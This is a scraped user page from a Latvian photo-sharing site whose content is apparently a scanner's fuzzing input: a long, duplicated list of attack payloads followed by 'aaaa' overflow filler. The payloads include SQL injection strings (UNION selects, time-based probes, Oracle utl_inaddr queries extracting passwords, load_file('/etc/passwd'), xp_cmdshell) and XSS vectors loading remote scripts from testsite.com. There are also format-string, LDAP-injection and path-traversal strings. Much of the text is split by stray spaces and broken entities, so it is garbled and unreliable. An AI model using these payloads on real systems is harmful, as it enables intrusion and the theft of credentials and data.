По-русски
English
Reģistrācija
Ielādēt fotogrāfijas
Preču katalogs
Cenas un pakalpojumi
Salonu adreses
Lietotāju albumi
Latvijas vēsture
Sludinājumi
Auto.lv - autotirgus
Latvijas transporta sludinajumu portāls
OCTA.lv - online kalkulātors
Izvēlaties labāko cenu starp visiem apdrošinātājiem!
Lietotāji
/
A
/
AivarsSlucis
Par lietotāju
Nosūtīt saiti
Personālā izstāde
" or isNULL(1/0
) /*
" or isNULL(1/0
) /*
" or isNULL(1/0
) /*
" or isNULL(1/0
) /*
",
",
%#0123456x
%08x%x%s%p
%d%n%o %u%c%h%l%q
%j%z% z%t%i%e%g%
f%a%c %s%08x%%
%%20d
%%20n
%%20n
%%20s
%%20s
%%20x
%.2049d
%.2049d
%08x
%08x
%26%2339);
x=ale rt;x(%26%2
340 /finally through!/.
sour ce %26%2341);
//
%26%2339);
x=ale rt;x(%26%2
340 /finally through!/.
sour ce %26%2341);
//
%999999999
99s
%d%d%d%d
%p%p%p%p
%p%p%p%p%p
%p%p% p%p%p
%p%p%p%p%p
%p%p% p%p%p
%s%p%x%d
%s%p%x%d
%s%s%s%s
%s%s%s%s
%s%s%s%s%s
%s%s% s%s%s%s%s%
s%s%s %s%s%s%s%s
%s%s% s%s%s%s%s%
s%s%s %s%s%s%s%s
%s%s% s%s%s%s%s%
s%s%s %s%s%s%s%s
%s%s%s%s%s
%s%s% s%s%s%s%s%
s%s%s %s%s%s%s%s
%s%s% s%s%s%s%s%
s%s%s %s%s%s%s%s
%s%s% s%s%s%s%s%
s%s%s %s%s%s%s%s
%s%s%s%s%s
%s%s% s%s%s
%x%x%x%x
%x%x%x%x
%x%x%x%x%x
%x%x% x%x%x%x%x%
x%x%x %x%x%x%x%x
%x%x% x%x%x%x%x%
x%x%x %x%x%x%x%x
%x%x% x%x%x%x%x%
x%x%x %x%x%x%x%x
<!
--[i f gte IE 4]>
; <SCRIP
T>al ert(
39;XSS'
; );
</
SC
<!
--[i f gte IE 4]>
; <SCRIP
T>al ert(
39;XSS'
; );
</
SC
</
TITLE 2;<SCR
IPT>al
ert(
34;XSS"
; );
</
SCRIPT 62;
</
TITLE 2;<SCR
IPT>al
ert(
34;XSS"
; );
</
SCRIPT 62;
<<
SCRIPT>
;al ert(
34;XSS"
; );
/ /<
</
SCRIPT 62;
<<
SCRIPT>
;al ert(
34;XSS"
; );
/ /<
</
SCRIPT 62;
<BASE HREF=&
#34; javascript
: alert(
'XSS
39; );
/ /"
>
<BASE HREF=&
#34; javascript
: alert(
'XSS
39; );
/ /"
>
<BODY BACKGROUND
= ;"java
scrip t:aler
t('
;XSS' );
" >
<BODY BACKGROUND
= ;"java
scrip t:aler
t('
;XSS' );
" >
<BR SIZE=&
#34; &{
;aler t('
;XSS' )}
;" ;>
<BR SIZE=&
#34; &{
;aler t('
;XSS' )}
;" ;>
<DIV STYLE=
" ;backgroun
d-ima ge: url(ja
vascript
5 8;alert
0;'XSS
' )
<DIV STYLE=
" ;width:
; expression
(alert
('
XSS' ))
; ">
<DIV STYLE=
" ;backgroun
d-ima ge: url(ja
vascript
5 8;alert
0;'XSS
' )
<DIV STYLE=
" ;width:
; expression
(alert
('
XSS' ))
; ">
<HTML xmlns:
xss& #62; <?
import namespace&
#61; "xss
34; implementa
tion ="
ht
<HTML xmlns:
xss& #62; <?
import namespace&
#61; "xss
34; implementa
tion ="
ht
<IFRAM
E SRC=
34;j avascript&
#58;a lert(&
#39;XSS
9; );
" ><
/IFRAM
E&
<IFRAM
E SRC=
34;j avascript&
#58;a lert(&
#39;XSS
9; );
" ><
/IFRAM
E&
<IMG DYNSRC=
; 4;javascri
pt 8;alert
0;'XSS
' );
" >
<IMG DYNSRC=
; 4;javascri
pt 8;alert
0;'XSS
' );
" >
<IMG SRC = " j a v a s c r i p t : a l e r t ( ' X S S ' ) "
<IMG SRC = " j a v a s c r i p t : a l e r t ( ' X S S ' ) "
<IMG SRC=
34;j avascript&
#58;a lert(&
#39;XSS
9; );
" >
<IMG SRC=
34;h ttp:
47; 47;www.the
sitey ouareon.co
m/ ;somecomma
nd.ph p?some
varia bl
<IMG SRC=
39;v bscript
8;msg box(
34;XSS"
; )'
>
<IMG SRC=
34;l ivescript&
#58;& #91;code
93; 34;>
<IMG SRC=ja
vasc ript:a
lert& #40;&q
uot; ;XSS&q
uot 59;)
62;
<IMG SRC=
34;j av ascript
8;al ert(
39;XSS'
; );
" >
<IMG SRC=
34;j av&
5;x0A;
ascript& #58;alert&
#40;'X
SS' );
" >
<IMG SRC=
34;j avascript&
#58;a lert(&
#39;XSS
9; )"
<IMG SRC=
34;j avascript&
#58;a lert(&
#39;XSS
9; );
" >
<IMG SRC=
34;h ttp:
47; 47;www.the
sitey ouareon.co
m/ ;somecomma
nd.ph p?some
varia bl
<IMG SRC=
39;v bscript
8;msg box(
34;XSS"
; )'
>
<IMG SRC=
34;l ivescript&
#58;& #91;code
93; 34;>
<IMG SRC=ja
vasc ript:a
lert& #40;&q
uot; ;XSS&q
uot 59;)
62;
<IMG SRC=
34;j av ascript
8;al ert(
39;XSS'
; );
" >
<IMG SRC=
34;j av&
5;x0A;
ascript& #58;alert&
#40;'X
SS' );
" >
<IMG SRC=
34;j avascript&
#58;a lert(&
#39;XSS
9; )"
<LINK REL=
34;s tylesheet&
#34; HREF=&
#34; http:&
#47;& #47;testsi
te.co m/xss.
css 34
<LINK REL=
34;s tylesheet&
#34; HREF=&
#34; http:&
#47;& #47;testsi
te.co m/xss.
css 34
<META HTTP-EQUIV
= ;"refr
esh 34; CONTENT
1; 34;0;u
rl=j avascript&
#58;a lert(&
<META HTTP-EQUIV
= ;"refr
esh 34; CONTENT
1; 34;0; URL=ht
tp 58;/
47; 59;U
<META HTTP-EQUIV
= ;"Link
" Content
1; 34;<ht
tp:
7 ;/test
site. com/xs
<META HTTP-EQUIV
= ;"refr
esh 34; CONTENT
1; 34;0;u
rl=j avascript&
#58;a lert(&
<META HTTP-EQUIV
= ;"refr
esh 34; CONTENT
1; 34;0; URL=ht
tp 58;/
47; 59;U
<META HTTP-EQUIV
= ;"Link
" Content
1; 34;<ht
tp:
7 ;/test
site. com/xs
<SCRIP
T a="
; 2;" SRC=
34;h ttp:
47; 47;testsit
e.com /xss.j
s" ;>&
<SCRIP
T a="
;bla h" ''
SRC=
34;h ttp:
47; 47;testsit
e.com /xss.j
s&
<SCRIP
T a=`
; 2;` SRC=
34;h ttp:
47; 47;testsit
e.com /xss.j
s" ;>&
<SCRIP
T a="
; 2;'
2; 4; SRC=
34;h ttp:
47; 47;testsit
e.com /xss.j
s&
<SCRIP
T a="
; 2;" SRC=
34;h ttp:
47; 47;testsit
e.com /xss.j
s" ;>&
<SCRIP
T a="
;bla h" ''
SRC=
34;h ttp:
47; 47;testsit
e.com /xss.j
s&
<SCRIP
T a=`
; 2;` SRC=
34;h ttp:
47; 47;testsit
e.com /xss.j
s" ;>&
<SCRIP
T a="
; 2;'
2; 4; SRC=
34;h ttp:
47; 47;testsit
e.com /xss.j
s&
<SCRIP
T SRC=ht
tp 58;/
47;te stsite.com
/ xss.js>
;</
;SCRIPT 62;
<SCRIP
T SRC=ht
tp 58;/
47;te stsite.com
/ xss.js
<SCRIP
T SRC=ht
tp 58;/
47;te stsite.com
/ xss.js>
;</
;SCRIPT 62;
<SCRIP
T SRC=ht
tp 58;/
47;te stsite.com
/ xss.js
<SCRIP
T/XS S SRC=
34;h ttp:
47; 47;testsit
e.com /xss.j
s" ;><
;/SCRI
P
<SCRIP
T/XS S SRC=
34;h ttp:
47; 47;testsit
e.com /xss.j
s" ;><
;/SCRI
P
<SCRIP
T>a& #61;/X
SS 7; alert(
a.source
41; </
SCRIPT 62;
<SCRIP
T>a& #61;/X
SS 7; alert(
a.source
41; </
SCRIPT 62;
<STYLE
TYPE=&
#34; text/j
avasc ript"&
#62;a lert(&
#39;XSS
9; );
</
STY
<STYLE
type=&
#34; text/c
ss 4;>BOD
Y 3;backgrou
nd 8;url(
"javas
cri pt:
<STYLE
TYPE=&
#34; text/j
avasc ript"&
#62;a lert(&
#39;XSS
9; );
</
STY
<STYLE
type=&
#34; text/c
ss 4;>BOD
Y 3;backgrou
nd 8;url(
"javas
cri pt:
<TABLE
BACKGROUND
= ;"java
scrip t:aler
t('
;XSS' )"
> </
TABLE&
<TABLE
BACKGROUND
= ;"java
scrip t:aler
t('
;XSS' )"
> </
TABLE&
<XML ID=
4;xs s">
;<I
2;<B
62;<IM
G SRC=
34;j avas<&
#33;-- --
<XML ID=
4;xs s">
;<I
2;<B
62;<IM
G SRC=
34;j avas<&
#33;-- --
<XSS STYLE=
" ;xss:e
xpres sion(a
lert(&
#39;XSS
9; ))
" >
<XSS STYLE=
" ;behavior&
#58; url(ht
tp:
7 ;/test
site. com/xs
s.htc );
&
<XSS STYLE=
" ;xss:e
xpres sion(a
lert(&
#39;XSS
9; ))
" >
<XSS STYLE=
" ;behavior&
#58; url(ht
tp:
7 ;/test
site. com/xs
s.htc );
&
' -- &password=
' -- &password=
' and 1=( if((load f
ile( char(110,4
6,101,120,
116))char(
39, 39)),1,0))
;
' and 1=( if((load f
ile( char(110,4
6,101,120,
116))char(
39, 39)),1,0))
;
' and 1=0) union all
' and 1=0) union all
' AND 1=utl inad
dr.g et host ad
dress ((SELECT banner FROM v$version WHERE ROWNUM=1))
AND 'i'='i
' AND 1=utl inad
dr.g et host ad
dress ((SELECT SYS.DATABA
SE N AME FROM DUAL)) AND 'i'='i
' AND 1=utl inad
dr.g et host ad
dress ((SELECT global nam
e FROM global nam
e)) AND 'i'='i
' AND 1=utl inad
dr.g et host ad
dress ((SELECT COUNT(DIST
INCT (PASSWORD)
) FROM SYS.USER$)
) AND 'i'='i
' AND 1=utl inad
dr.g et host ad
dress ((SELECT COUNT(DIST
INCT (column na
me)) FROM sys.all ta
b co lumns))
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(U
SERN AME) FROM (SELECT DISTINCT(U
SERN AME), ROWN
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(t
able name) FROM (SELECT DISTINCT(t
able name),
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(g
rant ed role) FROM (SELECT DISTINCT(g
rant ed rol
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(P
ASSW ORD) FROM (SELECT DISTINCT(P
ASSW ORD), ROWN
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(c
olum n name) FROM (SELECT DISTINCT(c
olum n name)
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(U
SERN AME) FROM (SELECT DISTINCT(U
SERN AME), ROWN
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(t
able name) FROM (SELECT DISTINCT(t
able name),
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(g
rant ed role) FROM (SELECT DISTINCT(g
rant ed rol
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(P
ASSW ORD) FROM (SELECT DISTINCT(P
ASSW ORD), ROWN
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(c
olum n name) FROM (SELECT DISTINCT(c
olum n name)
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(U
SERN AME) FROM (SELECT DISTINCT(U
SERN AME), ROWN
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(t
able name) FROM (SELECT DISTINCT(t
able name),
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(g
rant ed role) FROM (SELECT DISTINCT(g
rant ed rol
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(P
ASSW ORD) FROM (SELECT DISTINCT(P
ASSW ORD), ROWN
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(c
olum n name) FROM (SELECT DISTINCT(c
olum n name)
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(U
SERN AME) FROM (SELECT DISTINCT(U
SERN AME), ROWN
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(t
able name) FROM (SELECT DISTINCT(t
able name),
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(g
rant ed role) FROM (SELECT DISTINCT(g
rant ed rol
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(P
ASSW ORD) FROM (SELECT DISTINCT(P
ASSW ORD), ROWN
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(c
olum n name) FROM (SELECT DISTINCT(c
olum n name)
' AND 1=utl inad
dr.g et host ad
dress ((SELECT banner FROM v$version WHERE ROWNUM=1))
AND 'i'='i
' AND 1=utl inad
dr.g et host ad
dress ((SELECT SYS.DATABA
SE N AME FROM DUAL)) AND 'i'='i
' AND 1=utl inad
dr.g et host ad
dress ((SELECT global nam
e FROM global nam
e)) AND 'i'='i
' AND 1=utl inad
dr.g et host ad
dress ((SELECT COUNT(DIST
INCT (PASSWORD)
) FROM SYS.USER$)
) AND 'i'='i
' AND 1=utl inad
dr.g et host ad
dress ((SELECT COUNT(DIST
INCT (column na
me)) FROM sys.all ta
b co lumns))
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(U
SERN AME) FROM (SELECT DISTINCT(U
SERN AME), ROWN
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(t
able name) FROM (SELECT DISTINCT(t
able name),
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(g
rant ed role) FROM (SELECT DISTINCT(g
rant ed rol
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(P
ASSW ORD) FROM (SELECT DISTINCT(P
ASSW ORD), ROWN
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(c
olum n name) FROM (SELECT DISTINCT(c
olum n name)
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(U
SERN AME) FROM (SELECT DISTINCT(U
SERN AME), ROWN
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(t
able name) FROM (SELECT DISTINCT(t
able name),
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(g
rant ed role) FROM (SELECT DISTINCT(g
rant ed rol
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(P
ASSW ORD) FROM (SELECT DISTINCT(P
ASSW ORD), ROWN
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(c
olum n name) FROM (SELECT DISTINCT(c
olum n name)
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(U
SERN AME) FROM (SELECT DISTINCT(U
SERN AME), ROWN
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(t
able name) FROM (SELECT DISTINCT(t
able name),
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(g
rant ed role) FROM (SELECT DISTINCT(g
rant ed rol
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(P
ASSW ORD) FROM (SELECT DISTINCT(P
ASSW ORD), ROWN
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(c
olum n name) FROM (SELECT DISTINCT(c
olum n name)
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(U
SERN AME) FROM (SELECT DISTINCT(U
SERN AME), ROWN
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(t
able name) FROM (SELECT DISTINCT(t
able name),
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(g
rant ed role) FROM (SELECT DISTINCT(g
rant ed rol
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(P
ASSW ORD) FROM (SELECT DISTINCT(P
ASSW ORD), ROWN
' AND 1=utl inad
dr.g et host ad
dress ((SELECT DISTINCT(c
olum n name) FROM (SELECT DISTINCT(c
olum n name)
' group by userid having 1=1--
' group by userid having 1=1--
' having 1=1--
' having 1=1--
' or ''='
' or ''='
' or '1'='1
' or '1'='1
' or '7659'='76
59
' or '7659'='76
59
' or 'a'='a
' or 'a'='a
' or 'text' = n'text'
' or 'text' = n'text'
' or 'unusual' = 'unusual'
' or 'unusual' = 'unusual'
' or 'whatever'
in ('whatever
')
' or 'whatever'
in ('whatever
')
' or 1 in (select @@version)
--
' or 1 in (select @@version)
--
' or 1/*
' or 1/*
' or 1=1 --
' or 1=1 --
' or 1=1 /*
' or 1=1 /*
' or 1=1--
' or 1=1--
' or 1=1--
' or 1=1--
' or 2 > 1
' or 2 > 1
' or username is not NULL or username = '
' or username is not NULL or username = '
' or username like char(37);
' or username like char(37);
' select * from informatio
n sc hema.table
s--
' select * from informatio
n sc hema.table
s--
' union (select NULL, (select @@version)
) --
' union (select NULL, NULL, NULL, (select @@version)
) --
' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)
) --
' union (select NULL, (select @@version)
) --
' union (select NULL, NULL, NULL, (select @@version)
) --
' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)
) --
' union select
' union select
' union select 1,load fil
e('/ etc/passwd
'),1, 1,1;
' union select 1,load fil
e('/ etc/passwd
'),1, 1,1;
'';!--"=&(
)
'';!--"=&(
)
') or ('a'='a
') or ('a'='a
'; exec ('sel' + 'ect us' + 'er')
'; exec ('sel' + 'ect us' + 'er')
'; exec master..xp
cmd shell 'ping 10.10.1.2'
--
'; exec master..xp
cmd shell 'ping 10.10.1.2'
--
'; if not((selec
t serverprop
erty ('isintegr
ateds ecurityonl
y')) 1) waitfor delay '0:0:2' --
'; if not((selec
t serverprop
erty ('isintegr
ateds ecurityonl
y')) 1) waitfor delay '0:0:2' --
'; if not(select
system use
r) 'sa' waitfor delay '0:0:2' --
'; if not(select
system use
r) 'sa' waitfor delay '0:0:2' --
'; if not(substr
ing( (select @@version)
,25, 1) 0) waitfor delay '0:0:2' --
'; if not(substr
ing( (select @@version)
,25, 1) 8) waitfor delay '0:0:2' --
'; if not(substr
ing( (select @@version)
,25, 1) 0) waitfor delay '0:0:2' --
'; if not(substr
ing( (select @@version)
,25, 1) 8) waitfor delay '0:0:2' --
';//%0da=e
val;b=aler
t;a(b(9));
//
';//%0da=e
val;b=aler
t;a(b(9));
//
';alert(0)
//\';alert
(1) //";alert(
2)//\ ";alert(3)
//--> ">'>alert(
4)=&alert(
5)");
';alert(0)
//\';alert
(1) //";alert(
2)//\ ";alert(3)
//--> ">'>alert(
4)=&alert(
5)");
'];a=eval;
b=ale rt;a(b(15)
);//
'];a=eval;
b=ale rt;a(b(15)
);//
'||'6
'||'6
'||(elt(-3
+5,bi n(15),ord(
10),hex(ch
ar(45) )))
'||(elt(-3
+5,bi n(15),ord(
10),hex(ch
ar(45) )))
'||utl htt
p.req uest('httP
://19 2.168.1.1/
')||'
'||utl htt
p.req uest('httP
://19 2.168.1.1/
')||'
';a=eval;b
=aler t;a(b(13))
;//
';a=eval;b
=aler t;a(b(13))
;//
(1?(1?a:1?
""[1?"ev\a
\l":0](1?"
\a\lert": 0):0:0).a:
0)[1?"\c\a
\l\l" :0](conten
t,1?"x \s\s":0)
(1?(1?a:1?
""[1?"ev\a
\l":0](1?"
\a\lert": 0):0:0).a:
0)[1?"\c\a
\l\l" :0](conten
t,1?"x \s\s":0)
*(|(object
class =*))
*(|(object
class =*))
*)(uid=*))
(|(ui d=*
*)(uid=*))
(|(ui d=*
*/*
*/*
*/a=eval;b
=aler t;a(b(/e/.
sourc e));/*
*/a=eval;b
=aler t;a(b(/e/.
sourc e));/*
*|
*|
.1024d
/../.. /../../../
boot .ini
/../.. /../../../
boot .ini
//
//
000%3cs%3e
111%3c/ s%3e%3c%73
%3e%3 2%32%32%3c
%2f%7 3%3e<
115>
1& #513
0/s
>& #x3c
000%3cs%3e
111%3c/ s%3e%3c%73
%3e%3 2%32%32%3c
%2f%7 3%3e<
115>
1& #513
0/s
>& #x3c
0x100
0x100
0x10000
0x10000
0x3fffffff
0x3fffffff
0x7fffffff
0x7fffffff
0xfffffffe
0xfffffffe
1 and 1=1
1 and 1=1
1 and user name(
) = 'dbo'
1 and user name(
) = 'dbo'
1 and user name(
) = 'dbo'
1 and user name(
) = 'dbo'
1 or 1=1
1 or 1=1
1 union all select 1,2,3,4,5,
6,na me from sysobjects
where xtype = 'u' --
1 union all select 1,2,3,4,5,
6,na me from sysobjects
where xtype = 'u' --
1'1
1'1
1;a=eval;b
=aler t;a(b(/c/.
sourc e));
1;a=eval;b
=aler t;a(b(/c/.
sourc e));
1\'1
1\'1
23 or 1=1; --
23 or 1=1; --
>"'
>"'
>%22%27>
>%22%27>
@import'ht
tp:// ha.ckers.o
rg/xs s.css';
@import'ht
tp:// ha.ckers.o
rg/xs s.css';
@im\port'\
ja\va sc\ript:al
ert(" XSS")';
@im\port'\
ja\va sc\ript:al
ert(" XSS")';
@im\port'\
ja\va sc\ript:al
ert(" XSS")';
@im\port'\
ja\va sc\ript:al
ert(" XSS")';
@var select @var as var into temp end --
@var select @var as var into temp end --
a'
a'
a' or 1=1; --
a' or 1=1; --
A=alert;A(
1)
A=alert;A(
1)
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aa
aaa
aaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
